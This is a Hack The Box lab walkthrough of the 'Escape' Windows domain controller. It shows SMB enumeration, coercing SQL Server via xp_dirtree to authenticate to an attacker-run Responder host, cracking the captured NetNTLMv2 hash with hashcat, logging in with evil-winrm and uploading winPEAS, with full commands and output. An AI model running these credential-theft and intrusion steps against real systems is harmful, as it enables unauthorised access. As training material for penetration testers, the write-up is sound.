HTB Escape Walkthrough

A very specific Windows machine, in which I found myself stuck, persistently searching for an exploit that later revealed itself to be a straightforward clue that facilitated a trivial privilege escalation. The subsequent privilege escalation led me to the desired root flag.

HTB Escape Walkthrough
A picture of Romans playing mini golf.

A very particular windows machine, in which I got stuck, stubbornly looking for an exploit which later turned out to be a simple clue left in plain sight that allowed a very trivial privesc. More challenging, but almost standard, the second privec which then led me to the desired root flag.

Let's start with the nmap scan.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:03 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 988 filtered tcp ports (no-response)
PORT     STATE SERVICE       VERSION
53/tcp   open  domain        Simple DNS Plus
88/tcp   open  kerberos-sec  Microsoft Windows Kerberos (server time: 2023-03-13 05:03:01Z)
135/tcp  open  msrpc         Microsoft Windows RPC
139/tcp  open  netbios-ssn   Microsoft Windows netbios-ssn
389/tcp  open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
445/tcp  open  microsoft-ds?
464/tcp  open  kpasswd5?
593/tcp  open  ncacn_http    Microsoft Windows RPC over HTTP 1.0
636/tcp  open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
1433/tcp open  ms-sql-s      Microsoft SQL Server 2019 15.00.2000.00; RTM
|_ms-sql-ntlm-info: ERROR: Script execution failed (use -d to debug)
|_ms-sql-info: ERROR: Script execution failed (use -d to debug)
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=SSL_Self_Signed_Fallback
| Not valid before: 2023-03-11T20:10:28
|_Not valid after:  2053-03-11T20:10:28
3268/tcp open  ldap          Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
|_ssl-date: 2023-03-13T05:04:24+00:00; +7h59m18s from scanner time.
3269/tcp open  ssl/ldap      Microsoft Windows Active Directory LDAP (Domain: sequel.htb0., Site: Default-First-Site-Name)
|_ssl-date: 2023-03-13T05:04:25+00:00; +7h59m18s from scanner time.
| ssl-cert: Subject: commonName=dc.sequel.htb
| Subject Alternative Name: othername: 1.3.6.1.4.1.311.25.1::<unsupported>, DNS:dc.sequel.htb
| Not valid before: 2022-11-18T21:20:35
|_Not valid after:  2023-11-18T21:20:35
Service Info: Host: DC; OS: Windows; CPE: cpe:/o:microsoft:windows

Host script results:
|_clock-skew: mean: 7h59m17s, deviation: 0s, median: 7h59m17s
| smb2-time: 
|   date: 2023-03-13T05:03:45
|_  start_date: N/A
| smb2-security-mode: 
|   311: 
|_    Message signing enabled and required

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 112.41 seconds

As usual, there are an infinite number of ports open on a windows machine and not happy, let's also take a look at the UDP ports.

┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox]
└─$ sudo nmap -sU 10.10.11.202
[sudo] password for in7rud3r: 
Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-12 17:13 EDT
Nmap scan report for 10.10.11.202
Host is up (0.11s latency).
Not shown: 998 open|filtered udp ports (no-response)
PORT    STATE SERVICE
53/udp  open  domain
123/udp open  ntp

Nmap done: 1 IP address (1 host up) scanned in 290.76 seconds

Little steal, thank goodness! Ok, let's analyze one port at a time!

53 - DNS, 88 - kerberos, 135, 593 - RPC, 139, 445 - SMB, 464

Nothing about this set, unless I've missed something.

139, 445 - SMB

The enum4linux tool doesn't enumerate anything in particular, let's try a manual approach.
I'm able to connect using the rpcclient tool (rpcclient -U "" -N 10.10.11.202), but investigating this would take too much time, I'll mark it as an activity to come back to if I can't find anything else and move on.

┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient -L //10.10.11.202 
Password for [WORKGROUP\in7rud3r]:

        Sharename       Type      Comment
        ---------       ----      -------
        ADMIN$          Disk      Remote Admin
        C$              Disk      Default share
        IPC$            IPC       Remote IPC
        NETLOGON        Disk      Logon server share 
        Public          Disk      
        SYSVOL          Disk      Logon server share 
Reconnecting with SMB1 for workgroup listing.
do_connect: Connection to 10.10.11.202 failed (Error NT_STATUS_RESOURCE_NAME_NOT_FOUND)
Unable to connect with SMB1 -- no workgroup available

The SAMBA client shows, among the classic windows shares, a "Public" folder that could be interesting, let's take a look.

┌──(in7rud3r㉿kali-muletto)-[~/GoogleDrive/hackthebox/_10.10.11.202 - Escape (win)]
└─$ smbclient --no-pass \\\\10.10.11.202\\Public
Try "help" to get a list of possible commands.
smb: \> dir
  .                                   D        0  Sat Nov 19 06:51:25 2022
  ..                                  D        0  Sat Nov 19 06:51:25 2022
  SQL Server Procedures.pdf           A    49551  Fri Nov 18 08:39:43 2022

                5184255 blocks of size 4096. 1428481 blocks available
smb: \> get "SQL Server Procedures.pdf"
getting file \SQL Server Procedures.pdf of size 49551 as SQL Server Procedures.pdf (10.3 KiloBytes/sec) (average 10.3 KiloBytes/sec)

Give a look at the pdf file.

img
img

Well, a good domain to insert into my /etc/hosts; go ahead.

389 (636, 3268, 3269) - LDAP

As for LDAP, I tried to navigate the structure using phpLDAPAdmin as usual, but without success.

1433 - SQL Server

And for the uninitiated, port 1433 is the one reserved for SQL Server. There will be a lot of work here; let's work.

The Metasploit Framework is full of attacks for SQL Server... and I think I've tried a lot of them.

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > use admin/mssql/mssql_enum
msf6 auxiliary(admin/mssql/mssql_enum) > options

Module options (auxiliary/admin/mssql/mssql_enum):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_enum) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum) > exploit
[*] Running module against 10.10.11.202

[*] 10.10.11.202:1433 - Running MS SQL Server Enumeration...
[*] 10.10.11.202:1433 - Version:
[*]     Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
[*]             Sep 24 2019 13:48:23 
[*]             Copyright (C) 2019 Microsoft Corporation
[*]             Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
[*] 10.10.11.202:1433 - Configuration Parameters:
[*] 10.10.11.202:1433 -         C2 Audit Mode is Not Enabled
[...]
[*] 10.10.11.202:1433 -         sp_getbindtoken
[*] 10.10.11.202:1433 -         sp_replincrementlsn
[*] 10.10.11.202:1433 - Instances found on this server:
[*] 10.10.11.202:1433 - Default Server Instance SQL Server Service is running under the privilege of:
[*] 10.10.11.202:1433 -         xp_regread might be disabled in this system
[*] Auxiliary module execution completed

msf6 auxiliary(admin/mssql/mssql_enum) > use admin/mssql/mssql_enum_domain_accounts
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > options

Module options (auxiliary/admin/mssql/mssql_enum_domain_accounts):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   FuzzNum              10000            yes       Number of principal_ids to fuzz.
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > exploit
[*] Running module against 10.10.11.202

[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[+] 10.10.11.202:1433 - Connected.
[*] 10.10.11.202:1433 - SQL Server Name: DC
[...][
[+] 10.10.11.202:1433 - 31 user accounts, groups, and computer accounts were found.
[*] 10.10.11.202:1433 - Query results have been saved to: /home/in7rud3r/.msf4/loot/20230313173523_default_10.10.11.202_mssql.domain.acc_775956.txt
[*] Auxiliary module execution completed

msf6 auxiliary(admin/mssql/mssql_enum_domain_accounts) > use admin/mssql/mssql_enum_sql_logins
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > options

Module options (auxiliary/admin/mssql/mssql_enum_sql_logins):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   FuzzNum              300              yes       Number of principal_ids to fuzz.
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_enum_sql_logins) > exploit
[*] Running module against 10.10.11.202

[*] 10.10.11.202:1433 - Attempting to connect to the database server at 10.10.11.202:1433 as PublicUser...
[...]
[*] 10.10.11.202:1433 -  - PublicUser
[*] 10.10.11.202:1433 -  - sa
[*] 10.10.11.202:1433 -  - sequel\Administrator
[*] Auxiliary module execution completed

I omitted some of the exploits I ran and also omitted some sections of the information returned by the scans, so as not to take up too much reading time.

But let's connect to the SQL Server instance and investigate the contents of the DBs.

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ python3 /usr/share/doc/python3-impacket/examples/mssqlclient.py sequel.htb/PublicUser:[email protected]
Impacket v0.10.0 - Copyright 2022 SecureAuth Corporation

[*] Encryption required, switching to TLS
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: master
[*] ENVCHANGE(LANGUAGE): Old Value: , New Value: us_english
[*] ENVCHANGE(PACKETSIZE): Old Value: 4096, New Value: 16192
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'master'.
[*] INFO(DC\SQLMOCK): Line 1: Changed language setting to us_english.
[*] ACK: Result: 1 - Microsoft SQL Server (150 7208) 
[!] Press help for extra shell commands
SQL> select @@version
                                                                                                                                                                                                                                                                  

---------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------   

Microsoft SQL Server 2019 (RTM) - 15.0.2000.5 (X64) 
        Sep 24 2019 13:48:23 
        Copyright (C) 2019 Microsoft Corporation
        Express Edition (64-bit) on Windows Server 2019 Standard 10.0 <X64> (Build 17763: ) (Hypervisor)
                                          

SQL> SELECT name, database_id, create_date FROM sys.databases; 
name                                                                                                                               database_id   create_date   

--------------------------------------------------------------------------------------------------------------------------------   -----------   -----------   

master                                                                                                                                       1   2003-04-08 09:13:36   

tempdb                                                                                                                                       2   2023-03-13 09:35:39   

model                                                                                                                                        3   2003-04-08 09:13:36   

msdb                                                                                                                                         4   2019-09-24 14:21:42   

SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG                                                                                                                      TABLE_SCHEMA                                                                                                                       TABLE_NAME                                                                                                                         TABLE_TYPE   

--------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   ----------   

master                                                                                                                             dbo                                                                                                                                spt_fallback_db                                                                                                                    b'BASE TABLE'   

master                                                                                                                             dbo                                                                                                                                spt_fallback_dev                                                                                                                   b'BASE TABLE'   

master                                                                                                                             dbo                                                                                                                                spt_fallback_usg                                                                                                                   b'BASE TABLE'   

master                                                                                                                             dbo                                                                                                                                spt_values                                                                                                                         b'VIEW'      

master                                                                                                                             dbo                                                                                                                                spt_monitor                                                                                                                        b'BASE TABLE'   

SQL> use tempdb
[*] ENVCHANGE(DATABASE): Old Value: master, New Value: tempdb
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'tempdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG                                                                                                                      TABLE_SCHEMA                                                                                                                       TABLE_NAME                                                                                                                         TABLE_TYPE   

--------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   ----------   

SQL> use model
[-] ERROR(DC\SQLMOCK): Line 1: The server principal "PublicUser" is not able to access the database "model" under the current security context.
SQL> use msdb
[*] ENVCHANGE(DATABASE): Old Value: tempdb, New Value: msdb
[*] INFO(DC\SQLMOCK): Line 1: Changed database context to 'msdb'.
SQL> SELECT * FROM INFORMATION_SCHEMA.TABLES;
TABLE_CATALOG                                                                                                                      TABLE_SCHEMA                                                                                                                       TABLE_NAME                                                                                                                         TABLE_TYPE   

--------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   --------------------------------------------------------------------------------------------------------------------------------   ----------   

msdb                                                                                                                               dbo                                                                                                                                syspolicy_policy_category_subscriptions                                                                                            b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_system_health_state                                                                                                      b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_policy_execution_history                                                                                                 b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_policy_execution_history_details                                                                                         b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_configuration                                                                                                            b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_conditions                                                                                                               b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_policy_categories                                                                                                        b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                sysdac_instances                                                                                                                   b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                syspolicy_object_sets                                                                                                              b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                dm_hadr_automatic_seeding_history                                                                                                  b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                syspolicy_policies                                                                                                                 b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                backupmediaset                                                                                                                     b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                backupmediafamily                                                                                                                  b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                backupset                                                                                                                          b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                autoadmin_backup_configuration_summary                                                                                             b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                backupfile                                                                                                                         b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                syspolicy_target_sets                                                                                                              b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                restorehistory                                                                                                                     b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                restorefile                                                                                                                        b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                syspolicy_target_set_levels                                                                                                        b'VIEW'      

msdb                                                                                                                               dbo                                                                                                                                restorefilegroup                                                                                                                   b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                logmarkhistory                                                                                                                     b'BASE TABLE'   

msdb                                                                                                                               dbo                                                                                                                                suspect_pages                                                                                                                      b'BASE TABLE'   

SQL>

Besides the SQL Server version which may come in handy to identify some specific exploit, the DB doesn't seem to contain many schemas and tables. I tried some exciting system queries, but most of them gave "permission denied". I, therefore, rely on the now official guide for identifying vulnerabilities.

1433 - Pentesting MSSQL - Microsoft SQL Server - HackTricks

Inside the guide, we find an interesting attack, which is worth trying.

The concept behind this attack is to force the SQL Server to authenticate to a fake server that will capture the unsuspecting service's credentials.

So, activate our responder...

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ sudo responder -I tun0
[sudo] password for in7rud3r: 
                                         __
  .----.-----.-----.-----.-----.-----.--|  |.-----.----.
  |   _|  -__|__ --|  _  |  _  |     |  _  ||  -__|   _|
  |__| |_____|_____|   __|_____|__|__|_____||_____|__|
                   |__|

           NBT-NS, LLMNR & MDNS Responder 3.1.3.0

  To support this project:
  Patreon -> https://www.patreon.com/PythonResponder
  Paypal  -> https://paypal.me/PythonResponder

  Author: Laurent Gaffie ([email protected])
  To kill this script hit CTRL-C


[+] Poisoners:
    LLMNR                      [ON]
    NBT-NS                     [ON]
    MDNS                       [ON]
    DNS                        [ON]
    DHCP                       [OFF]

[+] Servers:
    HTTP server                [ON]
    HTTPS server               [ON]
    WPAD proxy                 [OFF]
    Auth proxy                 [OFF]
    SMB server                 [ON]
    Kerberos server            [ON]
    SQL server                 [ON]
    FTP server                 [ON]
    IMAP server                [ON]
    POP3 server                [ON]
    SMTP server                [ON]
    DNS server                 [ON]
    LDAP server                [ON]
    RDP server                 [ON]
    DCE-RPC server             [ON]
    WinRM server               [ON]

[+] HTTP Options:
    Always serving EXE         [OFF]
    Serving EXE                [OFF]
    Serving HTML               [OFF]
    Upstream Proxy             [OFF]

[+] Poisoning Options:
    Analyze Mode               [OFF]
    Force WPAD auth            [OFF]
    Force Basic Auth           [OFF]
    Force LM downgrade         [OFF]
    Force ESS downgrade        [OFF]

[+] Generic Options:
    Responder NIC              [tun0]
    Responder IP               [10.10.14.111]
    Responder IPv6             [dead:beef:2::106d]
    Challenge set              [random]
    Don't Respond To Names     ['ISATAP']

[+] Current Session Variables:
    Responder Machine Name     [WIN-IM2J35A52MX]
    Responder Domain Name      [GFB0.LOCAL]
    Responder DCE-RPC Port     [47501]

[+] Listening for events...                                                                                                                                                                              

...let's take advantage of one of the Metasploit Framework exploits...

┌──(in7rud3r㉿kali-muletto)-[~]
└─$ msfconsole       
                                                  
 ______________________________________
/ it looks like you're trying to run a \                                                                                                                                                                 
\ module                               /                                                                                                                                                                 
 --------------------------------------                                                                                                                                                                  
 \                                                                                                                                                                                                       
  \                                                                                                                                                                                                      
     __                                                                                                                                                                                                  
    /  \                                                                                                                                                                                                 
    |  |                                                                                                                                                                                                 
    @  @                                                                                                                                                                                                 
    |  |                                                                                                                                                                                                 
    || |/                                                                                                                                                                                                
    || ||                                                                                                                                                                                                
    |\_/|                                                                                                                                                                                                
    \___/                                                                                                                                                                                                
                                                                                                                                                                                                         

       =[ metasploit v6.3.4-dev                           ]
+ -- --=[ 2294 exploits - 1201 auxiliary - 409 post       ]
+ -- --=[ 968 payloads - 45 encoders - 11 nops            ]
+ -- --=[ 9 evasion                                       ]

Metasploit tip: Use help <command> to learn more 
about any command
Metasploit Documentation: https://docs.metasploit.com/

msf6 > use auxiliary/admin/mssql/mssql_ntlm_stealer
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > options

Module options (auxiliary/admin/mssql/mssql_ntlm_stealer):

   Name                 Current Setting  Required  Description
   ----                 ---------------  --------  -----------
   PASSWORD                              no        The password for the specified username
   RHOSTS                                yes       The target host(s), see https://docs.metasploit.com/docs/using-metasploit/basics/using-metasploit.html
   RPORT                1433             yes       The target port (TCP)
   SMBPROXY             0.0.0.0          yes       IP of SMB proxy or sniffer.
   TDSENCRYPTION        false            yes       Use TLS/SSL for TDS data "Force Encryption"
   THREADS              1                yes       The number of concurrent threads (max one per host)
   USERNAME             sa               no        The username to authenticate as
   USE_WINDOWS_AUTHENT  false            yes       Use windows authentification (requires DOMAIN option set)


View the full module info with the info, or info -d command.

msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set password GuestUserCantWrite1
password => GuestUserCantWrite1
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set rhosts sequel.htb
rhosts => sequel.htb
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set username PublicUser
username => PublicUser
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > set smbproxy 10.10.14.111
smbproxy => 10.10.14.111
msf6 auxiliary(admin/mssql/mssql_ntlm_stealer) > exploit

[*] 10.10.11.202:1433     - DONT FORGET to run a SMB capture or relay module!
[*] 10.10.11.202:1433     - Forcing SQL Server at 10.10.11.202 to auth to 10.10.14.111 via xp_dirtree...
[+] 10.10.11.202:1433     - Successfully executed xp_dirtree on 10.10.11.202
[+] 10.10.11.202:1433     - Go check your SMB relay or capture module for goodies!
[*] sequel.htb:1433       - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed

...and wait for the attacked service to fall into the trap.

[...]
[+] Listening for events...                                                                                                                                                                              

[SMB] NTLMv2-SSP Client   : 10.10.11.202
[SMB] NTLMv2-SSP Username : sequel\sql_svc
[SMB] NTLMv2-SSP Hash     : sql_svc::sequel:5162e1326254c61a:EC2BB7C31D6D9609BA2E60B95A70D405:0101000000000000801D5DFA205AD901072D8534397365F50000000002000800470046004200300001001E00570049004E002D0049004D0032004A00330035004100350032004D00580004003400570049004E002D0049004D0032004A00330035004100350032004D0058002E0047004600420030002E004C004F00430041004C000300140047004600420030002E004C004F00430041004C000500140047004600420030002E004C004F00430041004C0007000800801D5DFA205AD90106000400020000000800300030000000000000000000000000300000DF8773489E613E8360EB2D86BF5C2D8E833BD6F0CEFE259881A1240933E805980A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310031000000000000000000                                                                              

We now have a NetNTLM hash that we can safely hashcat after identifying the corresponding value of the specific hash (5600).

example_hashes [hashcat wiki]
┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ cat NTLMv2-SSP.hash 
sql_svc::sequel:5162e1326254c61a:EC2BB7C31D6D9609BA2E60B95A70D405:0101000000000000801D5DFA205AD901072D8534397365F50000000002000800470046004200300001001E00570049004E002D0049004D0032004A00330035004100350032004D00580004003400570049004E002D0049004D0032004A00330035004100350032004D0058002E0047004600420030002E004C004F00430041004C000300140047004600420030002E004C004F00430041004C000500140047004600420030002E004C004F00430041004C0007000800801D5DFA205AD90106000400020000000800300030000000000000000000000000300000DF8773489E613E8360EB2D86BF5C2D8E833BD6F0CEFE259881A1240933E805980A001000000000000000000000000000000000000900220063006900660073002F00310030002E00310030002E00310034002E003100310031000000000000000000

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ hashcat -m 5600 NTLMv2-SSP.hash /usr/share/wordlists/rockyou.txt
hashcat (v6.2.6) starting

/sys/class/hwmon/hwmon4/temp1_input: No such file or directory

OpenCL API (OpenCL 3.0 PoCL 3.1+debian  Linux, None+Asserts, RELOC, SPIR, LLVM 14.0.6, SLEEF, DISTRO, POCL_DEBUG) - Platform #1 [The pocl project]
==================================================================================================================================================
* Device #1: pthread-penryn-Intel(R) Core(TM)2 Duo CPU     T8300  @ 2.40GHz, 1410/2885 MB (512 MB allocatable), 2MCU

Minimum password length supported by kernel: 0
Maximum password length supported by kernel: 256

Hashes: 1 digests; 1 unique digests, 1 unique salts
Bitmaps: 16 bits, 65536 entries, 0x0000ffff mask, 262144 bytes, 5/13 rotates
Rules: 1

Optimizers applied:
* Zero-Byte
* Not-Iterated
* Single-Hash
* Single-Salt

ATTENTION! Pure (unoptimized) backend kernels selected.
Pure kernels can crack longer passwords, but drastically reduce performance.
If you want to switch to optimized kernels, append -O to your commandline.
See the above message to find out about the exact limits.

Watchdog: Temperature abort trigger set to 90c

Host memory required for this attack: 0 MB

Dictionary cache built:
* Filename..: /usr/share/wordlists/rockyou.txt
* Passwords.: 14344392
* Bytes.....: 139921507
* Keyspace..: 14344385
* Runtime...: 4 secs

Cracking performance lower than expected?                 

* Append -O to the commandline.
  This lowers the maximum supported password/salt length (usually down to 32).

* Append -w 3 to the commandline.
  This can cause your screen to lag.

* Append -S to the commandline.
  This has a drastic speed impact but can be better for specific attacks.
  Typical scenarios are a small wordlist but a large ruleset.

* Update your backend API runtime / driver the right way:
  https://hashcat.net/faq/wrongdriver

* Create more work items to make use of your parallelization power:
  https://hashcat.net/faq/morework

SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba2e60b95a70d405:0101000000000000801d5dfa205ad901072d8534397365f50000000002000800470046004200300001001e00570049004e002d0049004d0032004a00330035004100350032004d00580004003400570049004e002d0049004d0032004a00330035004100350032004d0058002e0047004600420030002e004c004f00430041004c000300140047004600420030002e004c004f00430041004c000500140047004600420030002e004c004f00430041004c0007000800801d5dfa205ad90106000400020000000800300030000000000000000000000000300000df8773489e613e8360eb2d86bf5c2d8e833bd6f0cefe259881a1240933e805980a001000000000000000000000000000000000000900220063006900660073002f00310030002e00310030002e00310034002e003100310031000000000000000000:REGGIE1234ronnie
                                                          
Session..........: hashcat
Status...........: Cracked
Hash.Mode........: 5600 (NetNTLMv2)
Hash.Target......: SQL_SVC::sequel:5162e1326254c61a:ec2bb7c31d6d9609ba...000000
Time.Started.....: Sun Mar 19 05:29:14 2023 (30 secs)
Time.Estimated...: Sun Mar 19 05:29:44 2023 (0 secs)
Kernel.Feature...: Pure Kernel
Guess.Base.......: File (/usr/share/wordlists/rockyou.txt)
Guess.Queue......: 1/1 (100.00%)
Speed.#1.........:   395.6 kH/s (1.09ms) @ Accel:256 Loops:1 Thr:1 Vec:4
Recovered........: 1/1 (100.00%) Digests (total), 1/1 (100.00%) Digests (new)
Progress.........: 10700288/14344385 (74.60%)
Rejected.........: 0/10700288 (0.00%)
Restore.Point....: 10699776/14344385 (74.59%)
Restore.Sub.#1...: Salt:0 Amplifier:0-1 Iteration:0-1
Candidate.Engine.: Device Generator
Candidates.#1....: REJONTE -> REESY15987
Hardware.Mon.#1..: Util: 91%

Started: Sun Mar 19 05:27:49 2023
Stopped: Sun Mar 19 05:29:46 2023

And after some waiting and patience, the password comes out. What better tool to use than Evil-WinRM?

┌──(in7rud3r㉿kali-muletto)-[~/…/hackthebox/_10.10.11.202 - Escape (win)/attack/dwnl]
└─$ evil-winrm -i 10.10.11.202 -u sql_svc -p REGGIE1234ronnie 

Evil-WinRM shell v3.4

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\sql_svc\Documents> whoami
sequel\sql_svc
*Evil-WinRM* PS C:\Users\sql_svc\Documents> dir /users


    Directory: C:\users


Mode                LastWriteTime         Length Name
----                -------------         ------ ----
d-----         2/7/2023   8:58 AM                Administrator
d-r---        7/20/2021  12:23 PM                Public
d-----         2/1/2023   6:37 PM                Ryan.Cooper
d-----         2/7/2023   8:10 AM                sql_svc

Obviously, this user can't do much. You need a winPEAS session. We load the scanner on the BOX through the features made available by Evil-WinRM...

[...]
*Evil-WinRM* PS C:\Users\sql_svc> upload ../upld/winPEAS.bat /users/sql_svc/winPEAS.bat
Info: Uploading ../upld/winPEAS.bat to /users/sql_svc/winPEAS.bat

                                                             
Data: 47928 bytes of 47928 bytes copied

Info: Upload successful!

...and start it, saving the result so as not to lose it.

./winPEAS.bat | tee wpeas.output

Let's take it home the same way and analyze it.

[...]
*Evil-WinRM* PS C:\Users\sql_svc> download /users/sql_svc/wpeas.output ./wpeas.output
Info: Downloading /users/sql_svc/wpeas.output to ./wpeas.output

                                                             
Info: Download successful!

winpeas

Below is the information extracted from the winPEAS scan that I deemed worthy of note.

[...]
 [+] WSUS                                                                                                                                                                                                
   [i] You can inject 'fake' updates into non-SSL WSUS traffic (WSUXploit)                                                                                                                               
   [?] https://book.hacktricks.xyz/windows-hardening/windows-local-privilege-escalation#wsus                                                                                                             
[...]
PRIVILEGES INFORMATION                                                                                                                                                                                   
----------------------                                                                                                                                                                                   
                                                                                                                                                                                                         
Privilege Name                Description                    State                                                                                                                                       
============================= ============================== =======                                                                                                                                     
SeMachineAccountPrivilege     Add workstations to domain     Enabled                                                                                                                                     
SeChangeNotifyPrivilege       Bypass traverse checking       Enabled                                                                                                                                     
SeIncreaseWorkingSetPrivilege Increase a process working set Enabled                                                                                                                                     
[...]
